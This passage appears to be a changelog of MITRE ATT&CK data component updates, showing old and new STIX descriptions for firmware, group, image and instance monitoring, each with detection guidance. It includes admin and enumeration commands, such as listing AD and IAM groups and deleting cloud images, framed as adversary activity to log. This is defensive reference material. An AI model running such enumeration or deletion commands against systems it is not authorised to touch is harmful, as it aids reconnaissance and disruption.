| | | dversary activity, including malware persistence and system |
| | | compromise. Examples: - Changes to Master Boot Record (MBR |
| | | ): Modifying the MBR to load malicious code during the boot |
| | | process. - Changes to Volume Boot Record (VBR): Altering the |
| | | VBR to redirect boot processes to malicious locations. - Fi |
| | | rmware Configuration Changes: Modifying BIOS/UEFI settings s |
| | | uch as disabling Secure Boot. - Firmware Image Tampering: Up |
| | | dating firmware with a malicious or unauthorized image. - Lo |
| | | gs or Errors Indicating Firmware Changes: Logs showing unaut |
| | | horized firmware updates or checksum mismatches. This data |
| | | component can be collected through the following measures: |
| | | - BIOS/UEFI Logs: Enable and monitor BIOS/UEFI logs to captu |
| | | re settings changes or firmware updates. - Firmware Integrit |
| | | y Monitoring: Use tools or firmware security features to det |
| | | ect changes to firmware components. - Endpoint Detection and |
| | | Response (EDR) Solutions: Many EDR platforms can detect abn |
| | | ormal firmware activity, such as changes to MBR/VBR or unaut |
| | | horized firmware updates. - File System Monitoring: Monitor |
| | | changes to MBR/VBR-related files using tools like Sysmon or |
| | | auditd. - Windows Example (Sysmon): Monitor Event ID 7 ( |
| | | Raw disk access). - Linux Example (auditd): `auditctl -w |
| | | /dev/sda -p wa -k firmware_modification` - Network Traffic |
| | | Analysis: Capture firmware updates downloaded over the netwo |
| | | rk, particularly from untrusted sources. Use network monitor |
| | | ing tools like Zeek or Wireshark to analyze firmware-related |
| | | traffic. - Secure Boot Logs: Collect and analyze Secure Boo |
| | | t logs for signs of tampering or unauthorized configurations |
| | | . Example: Use PowerShell to retrieve Secure Boot settings o |
| | | n Windows: `Confirm-SecureBootUEFI` - Vendor-Specific Firmwa |
| | | re Tools: Many hardware vendors provide tools for firmware i |
| | | ntegrity checks.Examples: - Intel Platform Firmware Resi |
| | | lience (PFR). - Lenovo UEFI diagnostics. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:12:52.606Z |
| description | Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record) | Changes made to firmware, which may include its settings, configurations, or underlying data. This can encompass alterations to the Master Boot Record (MBR), Volume Boot Record (VBR), or other firmware components critical to system boot and functionality. Such modifications are often indicators of adversary activity, including malware persistence and system compromise. Examples:
- Changes to Master Boot Record (MBR): Modifying the MBR to load malicious code during the boot process.
- Changes to Volume Boot Record (VBR): Altering the VBR to redirect boot processes to malicious locations.
- Firmware Configuration Changes: Modifying BIOS/UEFI settings such as disabling Secure Boot.
- Firmware Image Tampering: Updating firmware with a malicious or unauthorized image.
- Logs or Errors Indicating Firmware Changes: Logs showing unauthorized firmware updates or checksum mismatches.
This data component can be collected through the following measures:
- BIOS/UEFI Logs: Enable and monitor BIOS/UEFI logs to capture settings changes or firmware updates.
- Firmware Integrity Monitoring: Use tools or firmware security features to detect changes to firmware components.
- Endpoint Detection and Response (EDR) Solutions: Many EDR platforms can detect abnormal firmware activity, such as changes to MBR/VBR or unauthorized firmware updates.
- File System Monitoring: Monitor changes to MBR/VBR-related files using tools like Sysmon or auditd.
- Windows Example (Sysmon): Monitor Event ID 7 (Raw disk access).
- Linux Example (auditd): `auditctl -w /dev/sda -p wa -k firmware_modification`
- Network Traffic Analysis: Capture firmware updates downloaded over the network, particularly from untrusted sources. Use network monitoring tools like Zeek or Wireshark to analyze firmware-related traffic.
- Secure Boot Logs: Collect and analyze Secure Boot logs for signs of tampering or unauthorized configurations. Example: Use PowerShell to retrieve Secure Boot settings on Windows: `Confirm-SecureBootUEFI`
- Vendor-Specific Firmware Tools: Many hardware vendors provide tools for firmware integrity checks.Examples:
- Intel Platform Firmware Resilience (PFR).
- Lenovo UEFI diagnostics. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Group: Group Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | An extracted list of available groups and/or their associate | t | Extracting group lists from identity systems identifies perm |
| d settings (ex: AWS list-groups) | | issions, roles, or configurations. Adversaries may exploit h |
| | | igh-privilege groups or misconfigurations. Examples: - AWS |
| | | CLI: `aws iam list-groups` - PowerShell: `Get-ADGroup -Filte |
| | | r *` - (Saas) Google Workspace: Admin SDK Directory API - Az |
| | | ure: `Get-AzureADGroup` - Microsoft 365: Graph API `GET htt |
| | | ps://graph.microsoft.com/v1.0/groups` *Data Collection Meas |
| | | ures:* - Cloud Logging: Enable AWS CloudTrail, Azure Activi |
| | | ty Logs, and Google Workspace Admin Logs for group-related a |
| | | ctions. - Directory Monitoring: Track logs like AD Event ID |
| | | 4662 (object operations). - API Monitoring: Log API activity |
| | | like AWS IAM queries. - SaaS Monitoring: Use platform logs |
| | | (e.g., Office 365 Unified Audit Logs). - SIEM Integration: C |
| | | entralize group query tracking. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:15:40.457Z |
| description | An extracted list of available groups and/or their associated settings (ex: AWS list-groups) | Extracting group lists from identity systems identifies permissions, roles, or configurations. Adversaries may exploit high-privilege groups or misconfigurations. Examples:
- AWS CLI: `aws iam list-groups`
- PowerShell: `Get-ADGroup -Filter *`
- (Saas) Google Workspace: Admin SDK Directory API
- Azure: `Get-AzureADGroup`
- Microsoft 365: Graph API `GET https://graph.microsoft.com/v1.0/groups`
*Data Collection Measures:*
- Cloud Logging: Enable AWS CloudTrail, Azure Activity Logs, and Google Workspace Admin Logs for group-related actions.
- Directory Monitoring: Track logs like AD Event ID 4662 (object operations).
- API Monitoring: Log API activity like AWS IAM queries.
- SaaS Monitoring: Use platform logs (e.g., Office 365 Unified Audit Logs).
- SIEM Integration: Centralize group query tracking. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Group: Group Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about a group which describes group and acti | t | Group metadata includes attributes like name, permissions, p |
| vity around it, such as name, permissions, or user accounts | | urpose, and associated user accounts or roles, which adversa |
| within the group | | ries may exploit for privilege escalation. Examples: - Acti |
| | | ve Directory: `Get-ADGroup -Identity "Domain Admins" -Proper |
| | | ties Members, Description` - Azure AD: `Get-AzureADGroup -Ob |
| | | jectId <GroupId>` - Google Workspace: `GET https://admin.goo |
| | | gleapis.com/admin/directory/v1/groups/<groupKey>` - AWS IAM: |
| | | `aws iam list-group-policies --group-name <group_name>` - O |
| | | ffice 365: `GET https://graph.microsoft.com/v1.0/groups/<id> |
| | | ` *Data Collection Measures:* - Cloud Logging: - AWS C |
| | | loudTrail for IAM group-related activities. - Azure AD S |
| | | ign-In/Audit logs for metadata changes. - Google Admin A |
| | | ctivity logs for API calls. - Directory Logging: Log metadat |
| | | a access (e.g., Windows Event ID 4662). - API Monitoring: Lo |
| | | g API calls to modify group metadata (e.g., Microsoft Graph |
| | | API). - SIEM Integration: Centralize group metadata logs for |
| | | analysis. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:15:43.699Z |
| description | Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group | Group metadata includes attributes like name, permissions, purpose, and associated user accounts or roles, which adversaries may exploit for privilege escalation. Examples:
- Active Directory: `Get-ADGroup -Identity "Domain Admins" -Properties Members, Description`
- Azure AD: `Get-AzureADGroup -ObjectId `
- Google Workspace: `GET https://admin.googleapis.com/admin/directory/v1/groups/`
- AWS IAM: `aws iam list-group-policies --group-name `
- Office 365: `GET https://graph.microsoft.com/v1.0/groups/`
*Data Collection Measures:*
- Cloud Logging:
- AWS CloudTrail for IAM group-related activities.
- Azure AD Sign-In/Audit logs for metadata changes.
- Google Admin Activity logs for API calls.
- Directory Logging: Log metadata access (e.g., Windows Event ID 4662).
- API Monitoring: Log API calls to modify group metadata (e.g., Microsoft Graph API).
- SIEM Integration: Centralize group metadata logs for analysis.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Group: Group Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a group, such as membership, name, or permis | t | Changes made to a group, such as membership, name, or permis |
| sions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup) | | sions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup). E |
| | | xamples: - Active Directory: - Event ID 4728: Member a |
| | | dded to a global group. - Event ID 4732: Member added to |
| | | a local group. - Azure AD: `Set-AzureADGroup -ObjectId <Gro |
| | | upId> -DisplayName "New Name"` - AWS IAM: `aws iam update-gr |
| | | oup --group-name <GroupName> --new-path "/admin/"` - Google |
| | | Workspace: Modify permissions via Admin SDK API: `PATCH http |
| | | s://admin.googleapis.com/admin/directory/v1/groups/<groupKey |
| | | >` - Office 365: Modify groups via Graph API: `PATCH https:/ |
| | | /graph.microsoft.com/v1.0/groups/<groupId>` *Data Collectio |
| | | n Measures:* - Directory Logging: - Windows: Log EIDs 4 |
| | | 728 (add), 4729 (remove). - Azure AD: Enable "Audit logs |
| | | ." - Google Workspace: Enable Admin Activity logs. - |
| | | Office 365: Use Unified Audit Logs. - Cloud Monitoring: |
| | | - AWS: Log `UpdateGroup`, `AttachGroupPolicy`, `RemoveUserF |
| | | romGroup`. - Azure: Track modifications via Audit logs. |
| | | - API Monitoring: Log Google Admin SDK and Microsoft Graph A |
| | | PI calls. - SIEM Integration: Centralize and monitor group m |
| | | odification logs. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:15:46.920Z |
| description | Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup) | Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup). Examples:
- Active Directory:
- Event ID 4728: Member added to a global group.
- Event ID 4732: Member added to a local group.
- Azure AD: `Set-AzureADGroup -ObjectId -DisplayName "New Name"`
- AWS IAM: `aws iam update-group --group-name --new-path "/admin/"`
- Google Workspace: Modify permissions via Admin SDK API: `PATCH https://admin.googleapis.com/admin/directory/v1/groups/`
- Office 365: Modify groups via Graph API: `PATCH https://graph.microsoft.com/v1.0/groups/`
*Data Collection Measures:*
- Directory Logging:
- Windows: Log EIDs 4728 (add), 4729 (remove).
- Azure AD: Enable "Audit logs."
- Google Workspace: Enable Admin Activity logs.
- Office 365: Use Unified Audit Logs.
- Cloud Monitoring:
- AWS: Log `UpdateGroup`, `AttachGroupPolicy`, `RemoveUserFromGroup`.
- Azure: Track modifications via Audit logs.
- API Monitoring: Log Google Admin SDK and Microsoft Graph API calls.
- SIEM Integration: Centralize and monitor group modification logs. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Image: Image Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a virtual machine image (ex: Azure C | t | Initial construction of a virtual machine image within a clo |
| ompute Service Images PUT) | | ud environment. Virtual machine images are templates contain |
| | | ing an operating system and installed applications, which ca |
| | | n be deployed to create new virtual machines. Monitoring the |
| | | creation of these images is important because adversaries m |
| | | ay create custom images to include malicious software or mis |
| | | configurations for later exploitation. Examples: - Azure C |
| | | ompute Service Image Creation - Example: Creating a virt |
| | | ual machine image in Azure using Azure CLI: `az image create |
| | | --resource-group MyResourceGroup --name MyImage --source My |
| | | VM` - AWS EC2 AMI (Amazon Machine Image) Creation - Exam |
| | | ple: Creating an AMI from an EC2 instance: `aws ec2 create-i |
| | | mage --instance-id i-1234567890abcdef0 --name "MyAMI" --desc |
| | | ription "An AMI for my app"` - Google Cloud Compute Engine I |
| | | mage Creation - Example: Creating a custom image using g |
| | | cloud: `gcloud compute images create my-custom-image --sourc |
| | | e-disk my-disk --source-disk-zone us-central1-a` - VMware vS |
| | | phere - Example: Exporting a VM to create an OVF (Open V |
| | | irtualization Format) template: This could later be imported |
| | | into other environments with potential tampering. This dat |
| | | a component can be collected through the following measures: |
| | | Enable Cloud Platform Logging - Azure: Enable "Activity L |
| | | ogs" to capture image-related events such as PUT requests to |
| | | `Microsoft.Compute/images`. - AWS: Use AWS CloudTrail to mo |
| | | nitor `CreateImage` API calls. - Google Cloud: Enable "Cloud |
| | | Audit Logs" to track custom image creation events under `co |
| | | mpute.googleapis.com/images`. API Monitoring - Monitor API |
| | | activity to track the creation of new images using: - A |
| | | WS SDK/CLI `CreateImage`. - Azure REST API for image cre |
| | | ation. - Google Cloud Compute Engine APIs. Cloud SIEM I |
| | | ntegration - Ingest cloud platform logs into a centralized |
| | | SIEM for real-time monitoring and alerting. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:15:53.193Z |
| description | Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT) | Initial construction of a virtual machine image within a cloud environment. Virtual machine images are templates containing an operating system and installed applications, which can be deployed to create new virtual machines. Monitoring the creation of these images is important because adversaries may create custom images to include malicious software or misconfigurations for later exploitation. Examples:
- Azure Compute Service Image Creation
- Example: Creating a virtual machine image in Azure using Azure CLI: `az image create --resource-group MyResourceGroup --name MyImage --source MyVM`
- AWS EC2 AMI (Amazon Machine Image) Creation
- Example: Creating an AMI from an EC2 instance: `aws ec2 create-image --instance-id i-1234567890abcdef0 --name "MyAMI" --description "An AMI for my app"`
- Google Cloud Compute Engine Image Creation
- Example: Creating a custom image using gcloud: `gcloud compute images create my-custom-image --source-disk my-disk --source-disk-zone us-central1-a`
- VMware vSphere
- Example: Exporting a VM to create an OVF (Open Virtualization Format) template: This could later be imported into other environments with potential tampering.
This data component can be collected through the following measures:
Enable Cloud Platform Logging
- Azure: Enable "Activity Logs" to capture image-related events such as PUT requests to `Microsoft.Compute/images`.
- AWS: Use AWS CloudTrail to monitor `CreateImage` API calls.
- Google Cloud: Enable "Cloud Audit Logs" to track custom image creation events under `compute.googleapis.com/images`.
API Monitoring
- Monitor API activity to track the creation of new images using:
- AWS SDK/CLI `CreateImage`.
- Azure REST API for image creation.
- Google Cloud Compute Engine APIs.
Cloud SIEM Integration
- Ingest cloud platform logs into a centralized SIEM for real-time monitoring and alerting.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Image: Image Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of a virtual machine image (ex: Azure Compute Servic | t | Removal of a virtual machine image in a cloud infrastructure |
| e Images DELETE) | | (ex: Azure Compute Service Images DELETE) Examples: - Azu |
| | | re Compute Service Image Deletion - Example: Deleting a |
| | | virtual machine image using Azure CLI: `az image delete --na |
| | | me MyImage --resource-group MyResourceGroup` - AWS EC2 AMI ( |
| | | Amazon Machine Image) Deletion - Example: Deregistering |
| | | an AMI in AWS: `aws ec2 deregister-image --image-id ami-1234 |
| | | 567890abcdef0` - Google Cloud Compute Engine Image Deletion |
| | | - Example: Deleting a custom image in Google Cloud: `gcl |
| | | oud compute images delete my-custom-image` - VMware vSphere |
| | | - Example: Deleting a VM image/template from a vSphere e |
| | | nvironment: This data component can be collected through th |
| | | e following measures: Enable Cloud Platform Logging - Azur |
| | | e: Enable "Activity Logs" to capture DELETE requests to `Mic |
| | | rosoft.Compute/images`. - AWS: Use AWS CloudTrail to monitor |
| | | `DeregisterImage` or `DeleteSnapshot` API calls. - Google C |
| | | loud: Enable "Cloud Audit Logs" to track image deletion even |
| | | ts under `compute.googleapis.com/images`. API Monitoring - |
| | | Monitor API activity to track the deletion of images using: |
| | | - AWS SDK/CLI `DeregisterImage` or `DeleteSnapshot`. |
| | | - Azure REST API DELETE operations for images. - Googl |
| | | e Cloud Compute Engine APIs for image deletion. Cloud SIEM |
| | | Integration - Ingest logs into a centralized SIEM platform |
| | | for monitoring and alerting: Event Correlation - Correlate |
| | | image deletion events with unusual account activity or conc |
| | | urrent unauthorized operations. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:15:59.613Z |
| description | Removal of a virtual machine image (ex: Azure Compute Service Images DELETE) | Removal of a virtual machine image in a cloud infrastructure (ex: Azure Compute Service Images DELETE) Examples:
- Azure Compute Service Image Deletion
- Example: Deleting a virtual machine image using Azure CLI: `az image delete --name MyImage --resource-group MyResourceGroup`
- AWS EC2 AMI (Amazon Machine Image) Deletion
- Example: Deregistering an AMI in AWS: `aws ec2 deregister-image --image-id ami-1234567890abcdef0`
- Google Cloud Compute Engine Image Deletion
- Example: Deleting a custom image in Google Cloud: `gcloud compute images delete my-custom-image`
- VMware vSphere
- Example: Deleting a VM image/template from a vSphere environment:
This data component can be collected through the following measures:
Enable Cloud Platform Logging
- Azure: Enable "Activity Logs" to capture DELETE requests to `Microsoft.Compute/images`.
- AWS: Use AWS CloudTrail to monitor `DeregisterImage` or `DeleteSnapshot` API calls.
- Google Cloud: Enable "Cloud Audit Logs" to track image deletion events under `compute.googleapis.com/images`.
API Monitoring
- Monitor API activity to track the deletion of images using:
- AWS SDK/CLI `DeregisterImage` or `DeleteSnapshot`.
- Azure REST API DELETE operations for images.
- Google Cloud Compute Engine APIs for image deletion.
Cloud SIEM Integration
- Ingest logs into a centralized SIEM platform for monitoring and alerting:
Event Correlation
- Correlate image deletion events with unusual account activity or concurrent unauthorized operations.
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Image: Image Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about a virtual machine image such as name, | t | contextual information associated with a virtual machine ima |
| resource group, state, or type | | ge, such as its name, resource group, status (active or inac |
| | | tive), type (custom or prebuilt), size, creation date, and p |
| | | ermissions. This metadata is critical for understanding the |
| | | state and configuration of virtual machine images in cloud e |
| | | nvironments. Examples: - Azure Compute Service Image Metad |
| | | ata Example: - Name: MyCustomImage - Resource Group: |
| | | MyResourceGroup - State: Available - Type: Managed |
| | | Image - AWS EC2 AMI Metadata Example: - Image ID: ami-12 |
| | | 34567890abcdef0 - Name: ProdImage - State: Available |
| | | - Platform: Windows - Google Cloud Compute Engine Image |
| | | Metadata Example: - Image Name: webserver-image - P |
| | | roject: my-project-id - Family: webserver - Source D |
| | | isk: my-disk-id - VMware vSphere Template Metadata Example: |
| | | - Name: LinuxTemplate - Disk Size: 40GB - Networ |
| | | k Adapter: VM Network This data component can be collected |
| | | through the following measures: Cloud Platform-Specific Too |
| | | ls - Azure: - Use Azure CLI to query metadata: `az imag |
| | | e show --name MyCustomImage --resource-group MyResourceGroup |
| | | ` - AWS: - Use AWS CLI to describe AMI metadata: `aws ec |
| | | 2 describe-images --image-ids ami-1234567890abcdef0` - Googl |
| | | e Cloud: - Use Google Cloud SDK to retrieve image metada |
| | | ta: `gcloud compute images describe webserver-image` APIs |
| | | - Azure: `GET /subscriptions/{subscriptionId}/resourceGroup |
| | | s/{resourceGroupName}/providers/Microsoft.Compute/images/{im |
| | | ageName}` - AWS: `DescribeImages` API. - Google Cloud: `GET |
| | | https://compute.googleapis.com/compute/v1/projects/{project} |
| | | /global/images/{image}.` Cloud Management Portals - View m |
| | | etadata directly from the cloud provider's management consol |
| | | e or dashboard. SIEM Integration - Aggregate metadata into |
| | | SIEM platforms for centralized monitoring: |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:15:56.417Z |
| description | Contextual data about a virtual machine image such as name, resource group, state, or type | contextual information associated with a virtual machine image, such as its name, resource group, status (active or inactive), type (custom or prebuilt), size, creation date, and permissions. This metadata is critical for understanding the state and configuration of virtual machine images in cloud environments. Examples:
- Azure Compute Service Image Metadata Example:
- Name: MyCustomImage
- Resource Group: MyResourceGroup
- State: Available
- Type: Managed Image
- AWS EC2 AMI Metadata Example:
- Image ID: ami-1234567890abcdef0
- Name: ProdImage
- State: Available
- Platform: Windows
- Google Cloud Compute Engine Image Metadata Example:
- Image Name: webserver-image
- Project: my-project-id
- Family: webserver
- Source Disk: my-disk-id
- VMware vSphere Template Metadata Example:
- Name: LinuxTemplate
- Disk Size: 40GB
- Network Adapter: VM Network
This data component can be collected through the following measures:
Cloud Platform-Specific Tools
- Azure:
- Use Azure CLI to query metadata: `az image show --name MyCustomImage --resource-group MyResourceGroup`
- AWS:
- Use AWS CLI to describe AMI metadata: `aws ec2 describe-images --image-ids ami-1234567890abcdef0`
- Google Cloud:
- Use Google Cloud SDK to retrieve image metadata: `gcloud compute images describe webserver-image`
APIs
- Azure: `GET /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/images/{imageName}`
- AWS: `DescribeImages` API.
- Google Cloud: `GET https://compute.googleapis.com/compute/v1/projects/{project}/global/images/{image}.`
Cloud Management Portals
- View metadata directly from the cloud provider's management console or dashboard.
SIEM Integration
- Aggregate metadata into SIEM platforms for centralized monitoring:
|
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new instance (ex: instance.insert | t | The initial provisioning and construction of a virtual machi |
| within GCP Audit Logs) | | ne (VM) or compute instance within a cloud infrastructure en |
| | | vironment. This activity involves defining and allocating re |
| | | sources such as CPU, memory, storage, and networking to spin |
| | | up a new compute instance. Examples: - AWS: creating an EC |
| | | 2 instance using RunInstances API calls. - Azure, creating a |
| | | VM through the Azure Resource Manager (ARM). - GCP, an `ins |
| | | tance.insert` action recorded. *Data Collection Measures:* |
| | | - AWS CloudTrail: CloudTrail logs stored in S3 or accessibl |
| | | e via CloudWatch. - Azure Activity Logs: Accessible in Azure |
| | | Monitor or exported to a storage account. - GCP Audit Logs: |
| | | Logs Explorer or BigQuery. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:20.734Z |
| description | Initial construction of a new instance (ex: instance.insert within GCP Audit Logs) | The initial provisioning and construction of a virtual machine (VM) or compute instance within a cloud infrastructure environment. This activity involves defining and allocating resources such as CPU, memory, storage, and networking to spin up a new compute instance. Examples:
- AWS: creating an EC2 instance using RunInstances API calls.
- Azure, creating a VM through the Azure Resource Manager (ARM).
- GCP, an `instance.insert` action recorded.
*Data Collection Measures:*
- AWS CloudTrail: CloudTrail logs stored in S3 or accessible via CloudWatch.
- Azure Activity Logs: Accessible in Azure Monitor or exported to a storage account.
- GCP Audit Logs: Logs Explorer or BigQuery. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of an instance (ex: instance.delete within GCP Audit | t | Removal of a virtual machine (VM) or compute instance within |
| Logs) | | a cloud infrastructure. This activity results in the termin |
| | | ation and deletion of the allocated resources (e.g., CPU, me |
| | | mory, storage), making the instance unavailable for future u |
| | | se. Examples: - AWS: instance deletion involves the `Termin |
| | | ateInstances` API call, which is recorded in CloudTrail logs |
| | | . - Azure: VM deletion can be monitored via Azure Activity L |
| | | ogs, showing the `Microsoft.Compute/virtualMachines/delete` |
| | | operation. - GCP: instance deletion is logged as an instance |
| | | .delete operation within GCP Audit Logs. *Data Collection M |
| | | easures: - AWS CloudTrail: CloudTrail logs stored in S3 or |
| | | forwarded to CloudWatch. - Azure Activity Logs: Accessible |
| | | via Azure Monitor or exported to a storage account. - GCP Au |
| | | dit Logs: Logs Explorer or BigQuery. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:17.500Z |
| description | Removal of an instance (ex: instance.delete within GCP Audit Logs) | Removal of a virtual machine (VM) or compute instance within a cloud infrastructure. This activity results in the termination and deletion of the allocated resources (e.g., CPU, memory, storage), making the instance unavailable for future use. Examples:
- AWS: instance deletion involves the `TerminateInstances` API call, which is recorded in CloudTrail logs.
- Azure: VM deletion can be monitored via Azure Activity Logs, showing the `Microsoft.Compute/virtualMachines/delete` operation.
- GCP: instance deletion is logged as an instance.delete operation within GCP Audit Logs.
*Data Collection Measures:
- AWS CloudTrail: CloudTrail logs stored in S3 or forwarded to CloudWatch.
- Azure Activity Logs: Accessible via Azure Monitor or exported to a storage account.
- GCP Audit Logs: Logs Explorer or BigQuery. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | An extracted list of instances within a cloud environment (e | t | The process of retrieving or querying a list of virtual mach |
| x: instance.list within GCP Audit Logs) | | ine instances or compute instances within a cloud infrastruc |
| | | ture. This activity provides a view of all available or runn |
| | | ing instances, typically including their associated metadata |
| | | such as instance ID, name, state, and configuration details |
| | | . Examples: - AWS: instance enumeration involves the `Descr |
| | | ibeInstances` API call, which retrieves information about ru |
| | | nning or stopped EC2 instances. - Azure: VM enumeration can |
| | | be monitored via the `Microsoft.Compute/virtualMachines/read |
| | | ` operation. - GCP: instance enumeration is logged as an `in |
| | | stance.list` operation within GCP Audit Logs. *Data Collect |
| | | ion Measures:* - AWS CloudTrail: CloudTrail logs stored in |
| | | S3 or forwarded to CloudWatch. - Azure Activity Logs: Access |
| | | ible via Azure Monitor or exported to a storage account. - G |
| | | CP Audit Logs: Logs Explorer or BigQuery. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:14.328Z |
| description | An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs) | The process of retrieving or querying a list of virtual machine instances or compute instances within a cloud infrastructure. This activity provides a view of all available or running instances, typically including their associated metadata such as instance ID, name, state, and configuration details. Examples:
- AWS: instance enumeration involves the `DescribeInstances` API call, which retrieves information about running or stopped EC2 instances.
- Azure: VM enumeration can be monitored via the `Microsoft.Compute/virtualMachines/read` operation.
- GCP: instance enumeration is logged as an `instance.list` operation within GCP Audit Logs.
*Data Collection Measures:*
- AWS CloudTrail: CloudTrail logs stored in S3 or forwarded to CloudWatch.
- Azure Activity Logs: Accessible via Azure Monitor or exported to a storage account.
- GCP Audit Logs: Logs Explorer or BigQuery. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Instance: Instance Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to an instance, including its settings and/or c | t | Changes made to a virtual machine (VM) or compute instance, |
| ontrol data (ex: instance.addResourcePolicies or instances.s | | including alterations to its configuration, metadata, attach |
| etMetadata within GCP Audit Logs) | | ed policies, or operational state. Such modifications can in |
| | | clude updating metadata, attaching or detaching resource pol |
| | | icies, resizing instances, or modifying network configuratio |
| | | ns. Examples: - AWS: instance modifications include API act |
| | | ions like `ModifyInstanceAttribute`, `ModifyInstanceMetadata |
| | | Options`, or `RebootInstances`. - Azure: modifications can b |
| | | e tracked through operations like `Microsoft.Compute/virtual |
| | | Machines/write`. - GCP: instance modification events include |
| | | operations like `instances.setMetadata`, `instances.addReso |
| | | urcePolicies`, or `instances.resize`. *Data Collection Meas |
| | | ures:* - AWS CloudTrail: Log Location: Stored in S3 or forw |
| | | arded to CloudWatch. - Azure Activity Logs: Log Location: Ac |
| | | cessible via Azure Monitor or exported to a storage account. |
| | | - GCP Audit Logs: Log Location: Logs Explorer or BigQuery. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:13:07.954Z |
| description | Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs) | Changes made to a virtual machine (VM) or compute instance, including alterations to its configuration, metadata, attached policies, or operational state. Such modifications can include updating metadata, attaching or detaching resource policies, resizing instances, or modifying network configurations. Examples:
